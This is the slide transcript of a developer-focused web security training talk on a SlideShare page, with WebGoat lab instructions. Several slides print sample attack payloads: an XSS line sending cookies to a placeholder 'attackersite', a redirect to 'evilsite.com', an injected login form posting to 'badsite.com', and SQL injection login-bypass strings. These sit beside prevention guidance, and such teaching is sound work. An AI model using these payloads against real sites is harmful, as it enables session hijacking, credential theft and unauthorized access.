Your SlideShare is downloading. ×
0
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Devbeat Conference - Developer First Security

9,458

Published on

Topics include: …

Topics include:

- Sample and Demo of Top Application Risks
— Cross Site Scripting, SQL Injection, Access Control

- Who’s Monitoring Your Traffic?
— Encrypting in Transit
Secure Data Storage & Protection
— Correct Password

-Storage & Data Protection

-Growing Threats Plaguing Applications

Published in: Technology, Business
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
9,458
On Slideshare
0
From Embeds
0
Number of Embeds
36
Actions
Shares
0
Downloads
24
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Developer-first security Integrating Security into Development Michael Coates ! michael@ShapeSecurity.com michael-coates.blogspot.com @_mwc
  • 2. About Me michael@shapesecurity.com
  • 3. Reality
  • 4. “The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine” ! h"p://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking   h"p://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/  
  • 5. Data Loss & Breaches datalossdb.org Verizon Data Breach Report 2013
  • 6. Outside Attackers datalossdb.org Verizon Data Breach Report 2013
  • 7. Security - Into The Details • Sample and Demo of Top Application Risks
 — Cross Site Scripting, SQL Injection, Access Control • Who’s Monitoring Your Traffic?
 — Encrypting in Transit • Secure Data Storage & Protection
 — Correct Password Storage & Data Protection • Growing Threats Plaguing Applications
  • 8. WARNING Security Testing is ILLEGAL ON UNAUTHORIZED SYSTEMS
  • 9. 3 Dangerous Vulnerabilities Cross Site Scripting SQL Injection Access Control
  • 10. What are Web Requests Open console & enter the following:
 • 
 telnet google.com 80
 GET / HTTP/1.1 • Hit return 2 times
  • 11. Cross Site Scripting (XSS) • Problem: User controlled data returned in HTTP response contains HTML/JavaScript code • Impact: Session Hijacking, Full Control of Page, Malicious Redirects • Basic XSS Test:
 " ><script>alert(document.cookie)</script> • Cookie Theft Example:
 "><script>document.location='http://attackersite/ '+document.cookie</script>
  • 12. XSS Behind The Scenes http://shinypage.com?user=Bob JSP Code <h1>Glad to see you <%= request.getParameter("name") %></h1> HTML Source Rendered HTML <div>Glad to see you <b>Bob</b></div>
  • 13. XSS Behind The Scenes http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 14. XSS - Injecting HTML Rendered HTML
  • 15. Cross Site Scripting • Cross Site Scripting typically uses JavaScript to do bad things • Steal session cookies <script>alert(document.cookie)</script> • Redirect to bad pages 
 <script>window.location = "http://evilsite.com/"</script> • Rewrite page on the fly
  • 16. Lab! - Reflected XSS
  • 17. Reflected XSS Lab • Lesson: Cross-Site Scripting->Reflected XSS Attacks • Proxy Not Needed
  • 18. Lab! - Stored XSS
  • 19. Stored XSS Lab • Lesson: Cross-Site Scripting>Stored XSS Attacks • Proxy Not Needed
  • 20. XSS Prevention • Solution
 1. Output Encoding - converts command characters to benign characters for display
 2. Input Validation <h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1> < > “ ‘ & HTML Encoding &lt; &gt; &quote; ' &amp;
  • 21. XSS Attempt Revisited http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 22. Safe Handling Rendered HTML Glad to see you friend</b>
 <br><form method="post" action="badsite.com/ login"> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 23. XSS Resources • OWASP XSS Prevention Cheat Sheet 
 - http://bit.ly/XSS-OWASP • Content Security Policy 
 - http://bit.ly/CSP-OWASP • OWASP XSS Overview 
 - http://bit.ly/OWASPXSS
  • 24. SQL Injection • Problem: User controlled data improperly used with SQL statements • Impact: Arbitrary SQL Execution, Data Corruption, Data Theft • Basic SQL Injection Tests:
 OR 1=1 --
 ' OR '1'= '1'-- • Example Vulnerable Query:
 sqlQ = “Select user from UserTable where name= '+username+ ' and pass = '+password+ ' ”
  • 25. Lab! - SQL Lesson
  • 26. SQL Injection • Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection • Proxy Needed • Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
  • 27. SQL Injection • HTTP Post
 employee_id=112&password=x' OR ‘1'='1 &action=Login • Vulnerable SQL
 Select user from UserTable where name= '+username+ ' and pass = '+password+ ‘ • Resulting Statement
 Select user from UserTable where name= '112' and 
 pass = 'x' OR '1'='1' • Result: ... name = ' 112 ' and pass = 'x ' OR TRUE
  • 28. SQL Injection • Parameterized Queries
 No confusion with control characters
 Example: would look for password of ‘ or ‘1’=’1 • Input Validation
 Are special characters needed for most fields?
 What about non-printable characters %00-%0A?

  • 29. SQL Injection Resources • https://www.owasp.org/index.php/ SQL_Injection_Prevention_Cheat_Sheet
  • 30. Access Control • Problem: Developers assume some parts of app can’t be seen, tampered with or invoked by the user • Impact: Unauthorized data access, access to privileged functionality • Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments • Access Control Failure Example:! • http://somebadbank.com/showacct?id=101 • http://somebadbank.com/showacct?id=102

  • 31. Lab! - Access Control
  • 32. Access Control Violation • Lesson: Access Control Flaws>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control • Proxy Needed • Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”
  • 33. Access Control Violation • Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1 Host: localhost ! employee_id=105&action=ViewProfile
  • 34. Strong Access Controls • Access Control Performed Server Side • Never Relies Upon “Security by Obscurity” • Be Careful with Identifiers (e.g. id=123) • Attacker Can Send Anything in Request • Presentation Layer Controls Can Not Enforce Access Control
  • 35. Access Control Resources • https://www.owasp.org/index.php/ Access_Control_Cheat_Sheet
  • 36. Who’s Monitoring Your Traffic?
  • 37. Insecure Session Management • Secure login over HTTPS • • Password submitted encrypted Immediate redirect to HTTP • Session ID sent cleartext <-- vulnerability point https://site.com/login http://site.com/profile
  • 38. Vulnerable Redirects • User requests HTTP page, response redirects HTTPS • 302 Response is HTTP <-- Vulnerability Point
  • 39. Secure Design for Communication • Use HTTPS Throughout Web Site! • HTTP Strict Transport Security (HSTS)! • • • Opt-in security control Website instructs compatible browser to enable STS for site HSTS Forces (for enabled site): • All communication over HTTPS • No insecure HTTP requests sent from browser • No option for user to override untrusted certificates
  • 40. Strict Transport Security • Browser prevents HTTP requests to HSTS site • Any request to site is “upgraded” to HTTPS • No clear text HTTP traffic ever sent to HSTS site • Browser assumes HTTPS for HSTS sites
  • 41. Secure Data Storage & Protection
  • 42. Password Storage Bad Approaches! • Your own algorithm • Good Approach! md5 encryption • base64 encoding • rot 13 PBKDF2 sha1 • Bcrypt • • • + Per User Salt
  • 43. What Are We Protecting? Correct password hashing protects against:! ! • Offline attacks of password repository ! • Brute Force, Rainbow Attacks ! Does not address:! Guessing easy passwords Password theft, disclosure Session Hijacking Credential Stuffing
  • 44. Architecture for Sensitive Data https://site.com web server internal SSL database Monitor Database Queries & Response Size
  • 45. Encrypting Sensitive Data in Database Encrypt User Data Customer/Group Encryption Key Key Encrypting Key database Decrypt Hardware Security Module Encrypted [Customer/Group Encryption Key] Encryption within Database
 Unique keys per data region
 Key encrypting keys
 Hardware Security Modules (
  • 46. Growing Threats Plaguing Applications
  • 47. Denial of Service Denial of Service (DOS) Distributed Denial of Service (DDOS)
  • 48. Denial of Service Network DDOS Application Layer DDOS site.com/generateReport Exhaust Network! Bandwidth Exhaust Server ! CPU/Memory
  • 49. Application Denial of Service Application DDOS ! Traditional Network DDOS ! • overwhelms target with volume • • • • exhausts bandwidth / capacity of network devices invokes computationally intense application functions • exhausts CPU / memory of web servers Requires large number of machines • Requires few machines • Defenses: Few available, must customize Defenses: CDN, antiDDOS services
  • 50. Credential Stuffing compromised! server! Credentials! joe: abc123! sue: password1! bob: MyP0n3y Stolen Credentials! joe: abc123! sue: password1! bob: MyP0n3y sue:password1 joe: abc123 https://site.com/login!
  • 51. Take Aways • Understand top security threats and anticipate potential malicious use of application to design secure code • Multiple controls possible to protect sensitive data in transit and storage • Understand emerging threats to plan for appropriate defenses • Use OWASP BWA Security Lab and learn more!
  • 52. Thanks! michael@ShapeSecurity.com http://michael-coates.blogspot.com @_mwc
  • 53. Virtual Security Training Lab Setup
  • 54. Software • Vulnerable Server: OWASP’s Webgoat • Proxy Tool - OWASP’s ZAP (Zed Attack Proxy) • Browser • Virtual Machine: OWASP Broken Web App VM
  • 55. Test Connectivity to VM 1.Open Browser 2.Browse to your VM ip (listed in VM login page) • e.g. http://192.168.56.101 3.Should see OWASP BWA welcome page 4.Error? Check ip address of VM
  • 56. WebGoat • Click First Link - OWASP WebGoat version 5.3.x • Username / Password is guest / guest
  • 57. Understanding the Proxy • Proxy is middle-man between browser and web server • Assists with traffic manipulation & inspection Attacker’s Browser Web Proxy Web Server
  • 58. Understanding the Proxy Primary OS Browser Web Proxy Your Computer VM Web Server
  • 59. Enabling Proxy 1.Open ZAP 2.Configure Firefox to use proxy 3.Resend Request 4.Confirm received by proxy 5.Forward to web server (vm)
  • 60. Using A Proxy • ZAP - Configure to listen on 8080
  • 61. Set Firefox Proxy • Set Firefox proxy to 8080 • Preferences 
 -> Advanced 
 -> Network 
 -> Settings • Set HTTP Proxy • Important - clear 
 “No Proxy for” line
  • 62. Confirm Setup Works • Refresh Web Browser • Go to ZAP • See site in left-hand column
  • 63. Intercepting Traffic • Add a “breakpoint” by right clicking on the page and choosing “Break...” ! ! ! ! • Refresh the webpage - it will hang • Modify the request as needed, then press the “Continue” button
  • 64. “Hello World” of Proxies • Lesson: General->Http Basic • Objective: • Enter your name into text box • Intercept with proxy & change entered name to different value • Receive response & observe modified value is reversed Joe Sue euS Attacker’s euS Web Proxy Browser Web Server

×